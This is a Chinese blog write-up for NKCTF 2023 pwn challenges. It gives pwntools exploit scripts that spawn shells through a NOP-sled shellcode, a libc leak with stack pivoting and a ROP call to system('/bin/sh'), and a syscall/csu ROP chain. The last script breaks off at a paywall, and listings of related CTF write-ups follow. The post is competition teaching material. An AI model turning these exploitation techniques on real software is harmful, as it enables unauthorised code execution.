NKCTF PWN wp

已于 2023-03-30 11:20:03 修改
阅读量715 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: WP 文章标签: linux ubuntu 安全
于 2023-03-30 10:17:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51232724/article/details/129852012
本文详细介绍了在CTF比赛中解决PWN类问题的经验,涉及ezshellcode、栈迁移、ROP利用、堆溢出和libc地址泄露等技术。通过案例分析,阐述了如何利用缓冲区溢出、格式化字符串漏洞、堆布局操纵等方法实现系统权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

ezshellcode

填充nop抵消随机滑行到shellcode

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 1
if DEBUG:
    gdbOpen = 1
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./pwn')
else:
    gdbOpen = 0
    ip = 'node.yuzhian.com.cn'
    port = 38867
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")


debug("b *0x00000000004012F1")
shellcode = p8(0x90) * 104 + asm(shellcraft.sh()) 
p.sendafter("in 5 min!\n", shellcode)

p.interactive()

a_story_of_a_pwner

栈迁移然后刚好够弹一个参数执行system

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 0
if DEBUG:
    gdbOpen = 1
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    libc = ELF("./libc.so.6")
    p = process('./pwn')
else:
    gdbOpen = 0
    ip = 'node2.yuzhian.com.cn'
    port = 33627 
    libc = ELF("./libc.so.6")
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")


def choose(choice):
    p.sendlineafter(b"> \n", str(choice).encode('ascii'))

pop_rdi = 0x0000000000401573
leave_ret = 0x000000000040139E
debug("b *0x000000000040139F")
choose(4)
p.recvuntil(b'0x')
leak = int(p.recv(12), 16) - 0x84420
log.info("libc_base==>0x%x" %leak)
sys = leak + libc.sym['system']
binsh = leak + next(libc.search(b'/bin/sh'))
choose(1)
p.sendafter(b'comment?\n', p64(binsh))
choose(2)
p.sendafter(b'corment?\n', p64(pop_rdi))
choose(3)
p.sendafter(b'corMenT?\n', p64(sys))
choose(4)
payload = b'a'*0xa + p64(0x0000000000405098) + p64(leave_ret)
p.sendafter(b'heart...\n', payload)

p.interactive()

ez_stack

程序内直接就能找到syscall的gadget,使用其即可,注意的地方就是csu调用的时候是个指针,所以要把这个地址写入bss上才能正常使用

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./ez_stack')
DEBUG = 0
if DEBUG:
    gdbOpen = 1
    libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
    ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so")
    p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    #p = process('./ez_stack')
else:
    gdbOpen = 0
    ip = 'node2.yuzhian.com.cn'
    port = 35211 
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")

pop_rdi = 0x0000000000401283
pop_rsi = 0x0000000000401281 # pop rsi ; pop r15 ; ret
syscall = 0x000000000040114e
csu1 = 0x000000000040127A
csu2 = 0x0000000000401260

debug("b *0x00000000004011F6")
payload 
最低0.47元/天 解锁文章
NKCTF_WP
m0_73954357的博客
03-27 731
aa
NKCTF--pwn--Maimai查分器
fuiifiuiii的博客
03-25 730
怀疑可能远程的内部程序偏移不同,用-1到-8,+1到+8试,结果到+4的时候,欸?(后来发现是第二个payload里的4个A给输进去了,不知道为什么我本地不会这么输进去,远程却会()不过当时确实应该好好看看打印出来的东西,确实多了4个A)转换思路:栈溢出后自行用一个read,设置特别大的字节,由于想用orw嘛,就泄露了栈的地址,同时也可以作为这个read的地址。(不知道是不是修复了还是我的问题)没加是因为我本地之前正常不用+,然后本地调完忘了改,现在突然发现。好吧好吧,总算是做出来一个,没被零封()()
2023NKCTF PWN
m0_63437215的博客
03-28 1103
2023NKCTF
NKCTF2023 pwn wp
S4n_v1的博客
03-31 956
NKCTF2023 pwn....
NKCTF pwn方向wp
maple105890的博客
03-27 583
然后放堆快指针的附近有malloc_context+0x18的地址,里面有很多dirty_data,而且got表可写,泄露出来打free函数。然后发现二次输入能直接把rbp末尾覆盖成\x00,那就在栈中构造rop链就好了。所以考虑和ez_stack一样的做法,比爆破ogg快多了。虽然给了libc,但构造了⼀下shellcode也能出。存在格式化字符串漏洞,先把cananry泄露出来。给了libc,可以光明正大偷鸡了bushi。直接rand搞一下就出了,连爆破都不用。和西湖那题有一点像,但那题还要抬栈。
NKCTF 2023-misc全解(有脚本,有详解)
路baby的博客
03-29 4049
前几天打了nkctf ,因为自己也是主打misc,顺便也复现一遍,一点自己的拙见,各位师傅见笑了
NKCTF2023 web wp
adorkablezhenbai的博客
03-27 1202
web新手签到NKCTF,简单记录两个签到题。
2023NKCTF Writeup——W4ntY0u.
weixin_52365980的博客
03-27 4558
NKCTF2023是由N0wayBack战队举办。本次比赛采用线上网络安全技能大赛实践赛的形式,覆盖Web、Reverse、Pwn、Misc、Crypto、SocialEngineering等主流赛题方向,面向国内所有个体及团队 除了梦想外我们一无所有,将会和蔑视与困境做最后的斗争,这是最后一舞
NKCTF 2024(三月周报比赛一)
NYG694的博客
03-25 1132
常规思路原本是格式化泄露壳和libc,然后进行构造system/bin/sh来getshell,但是发现没有权限,只能通过orw来读取flag,并且因为栈空间不够需要构造栈迁移来。扫目录找到管理员界面登陆,账号Admin,密码Admin123,账号可以根据forget来进行查询是否存在,然后进行弱密码攻击,这里网上有两种rce,一种sstl一种代码执行。进去就是一个登录界面,根据提示tacooooo@qq.com,先尝试暴力破解密码,发现不行,测试tacooooo,成功。拿大佬的换下box就可以了。
[NKCTF2023]web/misc/blockchain-wp
qq_63923205的博客
03-27 1342
NKCTF WP
NKCTF-2023-RE-Baby_rust
qq_54894802的博客
03-31 729
简单的rust逆向
2023 NKCTF --- Crypto ezRSA wp
3tefanie的博客
03-28 1084
【世间情种偏好伤心事,苦中作乐,乐在其中,不伤心又如何算得上痴情人。】
NKCTF2024-Eznative
qq_24481913的博客
03-25 712
看到上层函数,其实这个sub_27F2d4是有符号的,我这里写wp的时候没有导入全部,名字叫做dialog,那么写过安卓开发的就知道这玩意就是弹窗了。然后在之前给出的GitHub项目中,发现其实他的enc出来的结果就是base64的,所以我们直接使用库就可以解密了。在old中也是有符号的,很明显的base。这里有个巨jb坑的地方,我点了n次一直不触发,后面来脾气了,长按一下,结果。短按是用来触发aaa的,当时hook过aaa,发现短按确实能触发。触发了,tnnd,后面发现应该是这个aaa与bbb的问题。
nkctf逆向(re)PMKF复现
m0_75098930的博客
03-29 795
具体有三个文件读取,这里有个小tips,他读的是C盘,如果没以管理员身份运行,可能会打不开,我不想以管理员身份运行,就直接将C patch 成 D,D盘开文件限制就小了。将其读取的字节,每两位与3进行与运算,也就是说,读取的16个字符实际是每两位判断一次,共64次,对照上面的迷宫步骤,刚好是64位。并按位异或0x15(v8的值),写入nk.ctf文件。第一个判断,也就是nk.ctf读取的第一个是0x5。第二个判断,nk.ctf读取的是“nkman”第三个判断,也就是走迷宫的判断,先画出迷宫图。
NKCTF
m0_73725283的博客
04-02 423
GGH这个东西真不懂(有关格,等我后面恶补一下),看了wp才知道可以直接爆破delta就可以得到答案。答案:nkctf{G0od_Y0u_Ar3_Kn0W_Ggh_Crypt0syst3m!答案:nkctf{cb5b7392-cca4-4ce2-87e7-930cf6b29959}因为delta不大于20,很小,完全可以爆破出来。python(把公钥转矩阵)
NKCTF-web(记一次越权)
jiyi_guoshu的博客
03-14 2830
这里写自定义目录标题题目如下进入网页,发现是一个登陆框,先注册一个账户点击登陆,发现网站返回的是一串字符,并且暗示我们要去注册admin账户。尝试注册admin为用户名的账户,网页提示用户名已被注册。 题目如下 进入网页,发现是一个登陆框,先注册一个账户 点击登陆,发现网站返回的是一串字符,并且暗示我们要去注册admin账户。 尝试注册admin为用户名的账户,网页提示用户名已被注册。 ...
NKCTF2024 wp
ZJPC007的博客
03-25 8714
题目可分为两个部分:首先,需要解出四个未知数 p, q, r, s。这一部分的关键在于通过数学公式推导,根据等式 x = k1q + r^p 和 y = k2q + r^p,可以发现 x 和 y 相减后剩余的部分是 q 的整数倍,利用最大公约数(gcd)算法可以求解出 q,然后根据已知信息逐步还原出其他三个未知数。
2024 NKCTF 全世界最简单的CTF
2301_79724395的博客
04-12 584
第一步是要获得global这个模块,原来是获取process模块,但是如果我获取到了global,那什么都好获取了。这次比赛没有做出来,看了wp,感觉差一点东西,也学到了一些绕过waf的方法。然后就要获取我们的process模块,并且引用child_process。它就不能够这样绕过了,因为它是方法,不是字符,不能当作字符处理。我们通过反射来绕过,就是根据你提供的对象的键获取到对应的值。但是题目过滤了很多东西,我们分别来思考怎么绕过。我们绕过了process,还需要绕过exec。很明显的vm沙盒逃逸问题。
[NKCTF 2024]web解析
rev1ve的博客
03-25 1309
create内为null,并且也没有其他可以引用的对象,这时候想要逃逸我们要用到一个函数中的内置对象的属性arguments.callee.caller,它可以返回函数的调用者。本题是考察如何沙箱逃逸实现RCE,waf过滤很多,process被办意味着我们需要用别的手段去得到process对象,中括号被办就不能利用js特性拼接绕过,接下来是最为精彩的一步,利用javascript内置函数去返回一个属性描述符(PropertyDescriptor)对象,其中包括value也就是属性值。
pwn羊城杯2024wp
最新发布
02-19
### 关于羊城杯2024 PWN比赛Writeup 针对2024年“羊城杯”粤港澳大湾区网络安全大赛PWN部分的比赛写真,可以参考Ns100kUp发布的详细分析[^1]。该文档不仅涵盖了比赛的整体情况,还特别提到了一些关键技术细节。 #### xpstack技术解析 在比赛中提到的一个重要概念是`xpstack`,这是一种用于处理特定漏洞利用的技术框架。通过这种技术,选手能够更高效地构建攻击载荷并绕过某些防护机制。 #### hardsandbox挑战分析 对于hardsandbox这一题目,存在一个问题即使用`openat2`函数仅能在本地环境中成功执行而无法应用于远程场景[^2]。这主要是因为`openat2`涉及到的操作权限以及网络环境下的文件描述符传递问题,在实际应用中需要额外考虑这些因素的影响。 以下是将USB数据转换成坐标的Python脚本示例,此代码片段来源于往届比赛中的一个实例[^3]: ```python nums = [] with open('usbdata.txt', 'r') as keys, open('xy.txt', 'w') as f: posx = 0 posy = 0 for line in keys: if len(line.strip()) != 12: continue x = int(line[3:5], 16) y = int(line[6:8], 16) if x > 127: x -= 256 if y > 127: y -= 256 posx += x posy += y btn_flag = int(line[0:2], 16) # 解析按钮标志位 if btn_flag != 0: # 如果检测到鼠标按键被按下,则记录当前位置 f.write(f"{posx} {posy}\n") ``` 此外,还有一个名为`Re BBBButton`的flag字符串提供了进一步的研究方向[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ShouCheng3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值